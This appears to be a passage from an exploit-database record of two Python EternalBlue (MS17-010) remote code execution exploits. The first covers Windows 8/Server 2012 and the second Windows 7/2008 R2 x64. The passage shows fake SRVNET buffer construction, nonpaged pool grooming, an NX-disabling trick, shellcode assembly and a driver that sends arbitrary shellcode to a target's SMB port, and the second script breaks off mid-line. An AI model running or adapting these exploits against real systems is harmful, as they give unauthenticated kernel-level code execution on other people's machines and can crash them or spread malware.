pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\r\n# The value MUST point to valid (might be fake) struct.\r\n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer\r\n# - 0x90 (VOID*) : MDL.Next should be NULL\r\n# - 0x98 (USHORT) : MDL.Size should be some value that not too small\r\n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\r\n# - 0x90 (VOID*) : MDL.Process should be NULL\r\n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\r\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\r\n# \r\n#\r\n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.\r\n# Here is related field for freeing corrupted buffer\r\n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0\r\n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()\r\n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\r\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\r\n# your shellcode as function argument\r\n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\r\n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\".\r\n# Here is x64 assembly code for setting nByteProcessed field\r\n# - fetch SRVNET_BUFFER address from function argument\r\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\r\n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)\r\n# \\x48\\x01\\xd1 add rcx, rdx\r\n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx\r\n# - set nByteProcessed for trigger free after return\r\n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48]\r\n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx\r\n \r\nTARGET_HAL_HEAP_ADDR = 0xffffffffffd00e00 # for put fake struct and shellcode\r\n \r\n# Note: feaList will be created after knowing shellcode size.\r\n \r\n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa\r\n# PTE of 0xffffffffffd01000 is at 0xfffff6ffffffe808\r\n# NX bit is at 0xfffff6ffffffe80f\r\n# MappedSystemVa = 0xfffff6ffffffe80f - 0x7f = 0xfffff6ffffffe790\r\nfakeSrvNetBufferX64Nx = '\\x00'*16\r\nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += '\\x00'*16\r\nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0xfffff6ffffffe80f-0x7f) # MDL.Process, MDL.MappedSystemVa\r\n \r\nfeaListNx = pack('<I', 0x10000)\r\nfeaListNx += ntfea9000\r\nfeaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name\r\n# stop copying by invalid flag (can be any value except 0 and 0x80)\r\nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678)\r\n \r\n \r\ndef createFakeSrvNetBuffer(sc_size):\r\n # 0x200 is size of fakeSrvNetBufferX64\r\n totalRecvSize = 0x80 + 0x200 + sc_size\r\n fakeSrvNetBufferX64 = '\\x00'*16\r\n fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40\r\n fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct\r\n fakeSrvNetBufferX64 += pack('<QQ', 0, 0)\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += '\\x00'*16\r\n fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\n fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa\r\n return fakeSrvNetBufferX64\r\n \r\ndef createFeaList(sc_size):\r\n feaList = pack('<I', 0x10000)\r\n feaList += ntfea9000\r\n fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)\r\n feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name\r\n # stop copying by invalid flag (can be any value except 0 and 0x80)\r\n feaList += pack('<BBH', 0x12, 0x34, 0x5678)\r\n return feaList\r\n \r\n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()\r\n# x64: fake struct is at ffffffff ffd00e00\r\n# offset 0x50: KSPIN_LOCK\r\n# offset 0x58: LIST_ENTRY must be valid address. cannot be NULL.\r\n# offset 0x110: array of pointer to function\r\n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function\r\n# some useful offset\r\n# offset 0x120: arg1 when invoking ptr to function\r\n# offset 0x128: arg2 when invoking ptr to function\r\n#\r\n# code path to get code exection after this struct is controlled\r\n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\r\nfake_recv_struct = ('\\x00'*16)*5\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)\r\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60\r\nfake_recv_struct += ('\\x00'*16)*10\r\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x1f0, 0) # offset 0x110: fn_ptr array\r\nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150\r\nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130\r\nfake_recv_struct += ('\\x00'*16)*11\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x200) # shellcode address\r\n \r\n \r\ndef getNTStatus(self):\r\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\r\nsetattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\r\n \r\ndef sendEcho(conn, tid, data):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\r\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\r\n transCommand['Data'] = smb.SMBEcho_Data()\r\n \r\n transCommand['Parameters']['EchoCount'] = 1\r\n transCommand['Data']['Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('got good ECHO response')\r\n else:\r\n print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))\r\n \r\n \r\n# do not know why Word Count can be 12\r\n# if word count is not 12, setting ByteCount without enough data will be failed\r\nclass SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters):\r\n structure = (\r\n ('MaxBuffer','<H'),\r\n ('MaxMpxCount','<H'),\r\n ('VCNumber','<H'),\r\n ('SessionKey','<L'),\r\n #('AnsiPwdLength','<H'),\r\n ('UnicodePwdLength','<H'),\r\n ('_reserved','<L=0'),\r\n ('Capabilities','<L'),\r\n )\r\n \r\ndef createSessionAllocNonPaged(target, size):\r\n # The big nonpaged pool allocation is in BlockingSessionSetupAndX() function\r\n # You can see the allocation logic (even code is not the same) in WinNT4 source code \r\n # https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071\r\n conn = smb.SMB(target, target)\r\n _, flags2 = conn.get_flags()\r\n # FLAGS2_EXTENDED_SECURITY MUST not be set\r\n flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY\r\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\r\n if size >= 0xffff:\r\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\r\n reqSize = size // 2\r\n else:\r\n flags2 |= smb.SMB.FLAGS2_UNICODE\r\n reqSize = size\r\n conn.set_flags(flags2=flags2)\r\n \r\n pkt = smb.NewSMBPacket()\r\n \r\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\r\n sessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters()\r\n \r\n sessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size\r\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\r\n sessionSetup['Parameters']['VCNumber'] = os.getpid()\r\n sessionSetup['Parameters']['SessionKey'] = 0\r\n sessionSetup['Parameters']['AnsiPwdLength'] = 0\r\n sessionSetup['Parameters']['UnicodePwdLength'] = 0\r\n sessionSetup['Parameters']['Capabilities'] = 0x80000000\r\n \r\n # set ByteCount here\r\n sessionSetup['Data'] = pack('<H', size) + '\\x00'*20\r\n pkt.addCommand(sessionSetup)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('SMB1 session setup allocate nonpaged pool success')\r\n else:\r\n print('SMB1 session setup allocate nonpaged pool failed')\r\n return conn\r\n \r\n \r\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\r\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\r\nclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\r\n structure = (\r\n ('TotalParameterCount','<H=0'),\r\n ('TotalDataCount','<H'),\r\n ('ParameterCount','<H=0'),\r\n ('ParameterOffset','<H=0'),\r\n ('ParameterDisplacement','<H=0'),\r\n ('DataCount','<H'),\r\n ('DataOffset','<H'),\r\n ('DataDisplacement','<H=0'),\r\n ('FID','<H=0'),\r\n )\r\n \r\ndef send_trans2_second(conn, tid, data, displacement):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n # assume no params\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\r\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\r\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\r\n \r\n transCommand['Parameters']['TotalParameterCount'] = 0\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+18\r\n transCommand['Data']['Pad1'] = ''\r\n \r\n transCommand['Parameters']['ParameterCount'] = 0\r\n transCommand['Parameters']['ParameterOffset'] = 0\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - fixedOffset % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = len(data)\r\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\r\n transCommand['Parameters']['DataDisplacement'] = displacement\r\n \r\n transCommand['Data']['Trans_Parameters'] = ''\r\n transCommand['Data']['Trans_Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n \r\n \r\ndef send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n command = pack('<H', setup)\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\r\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\r\n transCommand['Parameters']['MaxSetupCount'] = 1\r\n transCommand['Parameters']['MaxParameterCount'] = len(param)\r\n transCommand['Parameters']['MaxDataCount'] = 0\r\n transCommand['Data'] = smb.SMBTransaction2_Data()\r\n \r\n transCommand['Parameters']['Setup'] = command\r\n transCommand['Parameters']['TotalParameterCount'] = len(param)\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+38 + len(command)\r\n if len(param) > 0:\r\n padLen = (4 - fixedOffset % 4 ) % 4\r\n padBytes = '\\xFF' * padLen\r\n transCommand['Data']['Pad1'] = padBytes\r\n else:\r\n transCommand['Data']['Pad1'] = ''\r\n padLen = 0\r\n \r\n transCommand['Parameters']['ParameterCount'] = len(param)\r\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\r\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\r\n \r\n transCommand['Data']['Trans_Parameters'] = param\r\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB() # must be success\r\n if recvPkt.getNTStatus() == 0:\r\n print('got good NT Trans response')\r\n else:\r\n print('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()))\r\n sys.exit(1)\r\n \r\n i = firstDataFragmentSize\r\n while i < len(data):\r\n sendSize = min(4096, len(data) - i)\r\n if len(data) - i <= 4096:\r\n if not sendLastChunk:\r\n break\r\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\r\n i += sendSize\r\n \r\n if sendLastChunk:\r\n conn.recvSMB()\r\n return i\r\n \r\n \r\n# connect to target and send a large nbss size with data 0x80 bytes\r\n# this method is for allocating big nonpaged pool on target\r\ndef createConnectionWithBigSMBFirst80(target, for_nx=False):\r\n sk = socket.create_connection((target, 445))\r\n pkt = '\\x00' + '\\x00' + pack('>H', 0x8100)\r\n # There is no need to be SMB2 because we want the target free the corrupted buffer.\r\n # Also this is invalid SMB2 message.\r\n # I believe NSA exploit use SMB2 for hiding alert from IDS\r\n #pkt += '\\xffSMB' # smb2\r\n # it can be anything even it is invalid\r\n pkt += 'BAAD' # can be any\r\n if for_nx:\r\n # MUST set no delay because 1 byte MUST be sent immediately\r\n sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\r\n pkt += '\\x00'*0x7b # another byte will be sent later to disabling NX\r\n else:\r\n pkt += '\\x00'*0x7c\r\n sk.send(pkt)\r\n return sk\r\n \r\n \r\ndef exploit(target, shellcode, numGroomConn):\r\n # force using smb.SMB for SMB1\r\n conn = smb.SMB(target, target)\r\n \r\n # can use conn.login() for ntlmv2\r\n conn.login_standard('', '')\r\n server_os = conn.get_server_os()\r\n print('Target OS: '+server_os)\r\n if not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")):\r\n print('This exploit does not support this target')\r\n sys.exit()\r\n \r\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\r\n \r\n # Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command\r\n progress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False)\r\n \r\n # Another NT transaction for disabling NX\r\n nxconn = smb.SMB(target, target)\r\n nxconn.login_standard('', '')\r\n nxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\r\n nxprogress = send_nt_trans(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False)\r\n \r\n # create some big buffer at server\r\n # this buffer MUST NOT be big enough for overflown buffer\r\n allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x2010)\r\n \r\n # groom nonpaged pool\r\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\r\n srvnetConn = []\r\n for i in range(numGroomConn):\r\n sk = createConnectionWithBigSMBFirst80(target, for_nx=True)\r\n srvnetConn.append(sk)\r\n \r\n # create buffer size NTFEA_SIZE at server\r\n # this buffer will be replaced by overflown buffer\r\n holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE-0x10)\r\n # disconnect allocConn to free buffer\r\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\r\n allocConn.get_socket().close()\r\n \r\n # hope one of srvnetConn is next to holeConn\r\n for i in range(5):\r\n sk = createConnectionWithBigSMBFirst80(target, for_nx=True)\r\n srvnetConn.append(sk)\r\n \r\n # remove holeConn to create hole for fea buffer\r\n holeConn.get_socket().close()\r\n \r\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\r\n # first trigger to overwrite srvnet buffer struct for disabling NX\r\n send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)\r\n recvPkt = nxconn.recvSMB()\r\n retStatus = recvPkt.getNTStatus()\r\n if retStatus == 0xc000000d:\r\n print('good response status for nx: INVALID_PARAMETER')\r\n else:\r\n print('bad response status for nx: 0x{:08x}'.format(retStatus))\r\n \r\n # one of srvnetConn struct header should be modified\r\n # send '\\x00' to disable nx\r\n for sk in srvnetConn:\r\n sk.send('\\x00')\r\n \r\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\r\n # second trigger to place fake struct and shellcode\r\n send_trans2_second(conn, tid, feaList[progress:], progress)\r\n recvPkt = conn.recvSMB()\r\n retStatus = recvPkt.getNTStatus()\r\n if retStatus == 0xc000000d:\r\n print('good response status: INVALID_PARAMETER')\r\n else:\r\n print('bad response status: 0x{:08x}'.format(retStatus))\r\n \r\n # one of srvnetConn struct header should be modified\r\n # a corrupted buffer will write recv data in designed memory address\r\n for sk in srvnetConn:\r\n sk.send(fake_recv_struct + shellcode)\r\n \r\n # execute shellcode\r\n for sk in srvnetConn:\r\n sk.close()\r\n \r\n # nicely close connection (no need for exploit)\r\n nxconn.disconnect_tree(tid)\r\n nxconn.logoff()\r\n nxconn.get_socket().close()\r\n conn.disconnect_tree(tid)\r\n conn.logoff()\r\n conn.get_socket().close()\r\n \r\n \r\nif len(sys.argv) < 3:\r\n print(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0]))\r\n sys.exit(1)\r\n \r\nTARGET=sys.argv[1]\r\nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])\r\n \r\nfp = open(sys.argv[2], 'rb')\r\nsc = fp.read()\r\nfp.close()\r\n \r\nif len(sc) > 4096:\r\n print('Shellcode too long. The place that this exploit put a shellcode is limited to 4096 bytes.')\r\n sys.exit()\r\n \r\n# Now, shellcode is known. create a feaList\r\nfeaList = createFeaList(len(sc))\r\n \r\nprint('shellcode size: {:d}'.format(len(sc)))\r\nprint('numGroomConn: {:d}'.format(numGroomConn))\r\n \r\nexploit(TARGET, sc, numGroomConn)\r\nprint('done')\n\n# 0day.today [2018-01-02] #", "sourceHref": "https://0day.today/exploit/27803", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-06T07:16:22", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 / 2008 R2 (x64) - EternalBlue SMB Remote Code Execution (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-05-19T00:00:00", "id": "1337DAY-ID-27802", "href": "https://0day.today/exploit/description/27802", "sourceData": "#!/usr/bin/python\r\nfrom impacket import smb\r\nfrom struct import pack\r\nimport os\r\nimport sys\r\nimport socket\r\n \r\n'''\r\nEternalBlue exploit for Windows 7/2008 by sleepya\r\nThe exploit might FAIL and CRASH a target system (depended on what is overwritten)\r\n \r\nTested on:\r\n- Windows 7 SP1 x64\r\n- Windows 2008 R2 x64\r\n \r\nReference:\r\n- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\r\n \r\n \r\nBug detail:\r\n- For the bug detail, please see http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\r\n- You can see SrvOs2FeaListToNt(), SrvOs2FeaListSizeToNt() and SrvOs2FeaToNt() functions logic from WinNT4 source code\r\n https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/ea.c#L263\r\n- In vulnerable SrvOs2FeaListSizeToNt() function, there is a important change from WinNT4 in for loop. The psuedo code is here.\r\n if (nextFea > lastFeaStartLocation) {\r\n // this code is for shrinking FeaList->cbList because last fea is invalid.\r\n // FeaList->cbList is DWORD but it is cast to WORD.\r\n *(WORD *)FeaList = (BYTE*)fea - (BYTE*)FeaList;\r\n return size;\r\n }\r\n- Here is related struct info.\r\n#####\r\ntypedef struct _FEA { /* fea */\r\n BYTE fEA; /* flags */\r\n BYTE cbName; /* name length not including NULL */\r\n USHORT cbValue; /* value length */\r\n} FEA, *PFEA;\r\n \r\ntypedef struct _FEALIST { /* feal */\r\n DWORD cbList; /* total bytes of structure including full list */\r\n FEA list[1]; /* variable length FEA structures */\r\n} FEALIST, *PFEALIST;\r\n \r\ntypedef struct _FILE_FULL_EA_INFORMATION {\r\n ULONG NextEntryOffset;\r\n UCHAR Flags;\r\n UCHAR EaNameLength;\r\n USHORT EaValueLength;\r\n CHAR EaName[1];\r\n} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;\r\n######\r\n \r\n \r\nExploit info:\r\n- I do not reverse engineer any x86 binary so I do not know about exact offset.\r\n- The exploit use heap of HAL (address 0xffffffffffd00010 on x64) for placing fake struct and shellcode.\r\n This memory page is executable on Windows 7 and Wndows 2008.\r\n- The important part of feaList and fakeStruct is copied from NSA exploit which works on both x86 and x64.\r\n- The exploit trick is same as NSA exploit\r\n- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\r\n- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)\r\n- See the code and comment for exploit detail.\r\n \r\n \r\nsrvnet buffer info:\r\n- srvnet buffer contains a pointer to another struct and MDL about received buffer\r\n - Controlling MDL values results in arbitrary write\r\n - Controlling pointer to fake struct results in code execution because there is pointer to function\r\n- A srvnet buffer is created after target receiving first 4 bytes\r\n - First 4 bytes contains length of SMB message\r\n - The possible srvnet buffer size is \"..., 0x8???, 0x11000, 0x21000, ...\". srvnet.sys will select the size that big enough.\r\n- After receiving whole SMB message or connection lost, server call SrvNetWskReceiveComplete() to handle SMB message\r\n- SrvNetWskReceiveComplete() check and set some value then pass SMB message to SrvNetCommonReceiveHandler()\r\n- SrvNetCommonReceiveHandler() passes SMB message to SMB handler\r\n - If a pointer in srvnet buffer is modified to fake struct, we can make SrvNetCommonReceiveHandler() call our shellcode\r\n - If SrvNetCommonReceiveHandler() call our shellcode, no SMB handler is called\r\n - Normally, SMB handler free the srvnet buffer when done but our shellcode dose not. So memory leak happen.\r\n - Memory leak is ok to be ignored\r\n'''\r\n \r\n# wanted overflown buffer size (this exploit support only 0x10000 and 0x11000)\r\n# the size 0x10000 is easier to debug when setting breakpoint in SrvOs2FeaToNt() because it is called only 2 time\r\n# the size 0x11000 is used in nsa exploit. this size is more reliable.\r\nNTFEA_SIZE = 0x11000\r\n# the NTFEA_SIZE above is page size. We need to use most of last page preventing any data at the end of last page\r\n \r\nntfea10000 = pack('<BBH', 0, 0, 0xffdd) + 'A'*0xffde\r\n \r\nntfea11000 = (pack('<BBH', 0, 0, 0) + '\\x00')*600 # with these fea, ntfea size is 0x1c20\r\nntfea11000 += pack('<BBH', 0, 0, 0xf3bd) + 'A'*0xf3be # 0x10fe8 - 0x1c20 - 0xc = 0xf3bc\r\n \r\nntfea1f000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x2494 # with these fea, ntfea size is 0x1b6f0\r\nntfea1f000 += pack('<BBH', 0, 0, 0x48ed) + 'A'*0x48ee # 0x1ffe8 - 0x1b6f0 - 0xc = 0x48ec\r\n \r\nntfea = { 0x10000 : ntfea10000, 0x11000 : ntfea11000 }\r\n \r\n'''\r\nReverse from srvnet.sys (Win7 x64)\r\n- SrvNetAllocateNonPagedBufferInternal() and SrvNetWskReceiveComplete():\r\n \r\n// for x64\r\nstruct SRVNET_BUFFER {\r\n // offset from POOLHDR: 0x10\r\n USHORT flag;\r\n char pad[2];\r\n char unknown0[12];\r\n // offset from SRVNET_POOLHDR: 0x20\r\n LIST_ENTRY list;\r\n // offset from SRVNET_POOLHDR: 0x30\r\n char *pnetBuffer;\r\n DWORD netbufSize; // size of netBuffer\r\n DWORD ioStatusInfo; // copy value of IRP.IOStatus.Information\r\n // offset from SRVNET_POOLHDR: 0x40\r\n MDL *pMdl1; // at offset 0x70\r\n DWORD nByteProcessed;\r\n DWORD pad3;\r\n // offset from SRVNET_POOLHDR: 0x50\r\n DWORD nbssSize; // size of this smb packet (from user)\r\n DWORD pad4;\r\n QWORD pSrvNetWekStruct; // want to change to fake struct address\r\n // offset from SRVNET_POOLHDR: 0x60\r\n MDL *pMdl2;\r\n QWORD unknown5;\r\n // offset from SRVNET_POOLHDR: 0x70\r\n // MDL mdl1; // for this srvnetBuffer (so its pointer is srvnetBuffer address)\r\n // MDL mdl2;\r\n // char transportHeader[0x50]; // 0x50 is TRANSPORT_HEADER_SIZE\r\n // char netBuffer[0];\r\n};\r\n \r\nstruct SRVNET_POOLHDR {\r\n DWORD size;\r\n char unknown[12];\r\n SRVNET_BUFFER hdr;\r\n};\r\n'''\r\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\r\n# Here is the important fields on x64\r\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\r\n# The value MUST point to valid (might be fake) struct.\r\n# - offset 0x70 (MDL) : MDL for describe receiving SMB request buffer\r\n# - 0x70 (VOID*) : MDL.Next should be NULL\r\n# - 0x78 (USHORT) : MDL.Size should be some value that not too small\r\n# - 0x7a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\r\n# - 0x80 (VOID*) : MDL.Process should be NULL\r\n# - 0x88 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\r\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\r\n# \r\n#\r\n# To free the corrupted srvnet buffer, shellcode MUST modify some memory value to satisfy condition.\r\n# Here is related field for freeing corrupted buffer\r\n# - offset 0x10 (USHORT): be 0xffff to make SrvNetFreeBuffer() really free the buffer (else buffer is pushed to srvnet lookaside)\r\n# a corrupted buffer MUST not be reused.\r\n# - offset 0x48 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\r\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\r\n# your shellcode as function argument\r\n# - offset 0x60 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\r\n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\".\r\n# Here is x64 assembly code for setting nByteProcessed field\r\n# - fetch SRVNET_BUFFER address from function argument\r\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\r\n# - set nByteProcessed for trigger free after return\r\n# \\x8b\\x4a\\x2c mov ecx, [rdx+0x2c]\r\n# \\x89\\x4a\\x38 mov [rdx+0x38], ecx\r\n \r\nTARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010\r\nTARGET_HAL_HEAP_ADDR_x86 = 0xffdff000\r\n \r\nfakeSrvNetBufferNsa = pack('<II', 0x11000, 0)*2\r\nfakeSrvNetBufferNsa += pack('<HHI', 0xffff, 0, 0)*2\r\nfakeSrvNetBufferNsa += '\\x00'*16\r\nfakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x20)\r\nfakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0xffffffff, 0x60, 0x1004, 0) # _, x86 MDL.Next, .Size, .MdlFlags, .Process\r\nfakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86-0x80, 0, TARGET_HAL_HEAP_ADDR_x64) # x86 MDL.MappedSystemVa, _, x64 pointer to fake struct\r\nfakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # x64 pmdl2\r\n# below 0x20 bytes is overwritting MDL\r\n# NSA exploit overwrite StartVa, ByteCount, ByteOffset fields but I think no need because ByteCount is always big enough\r\nfakeSrvNetBufferNsa += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, 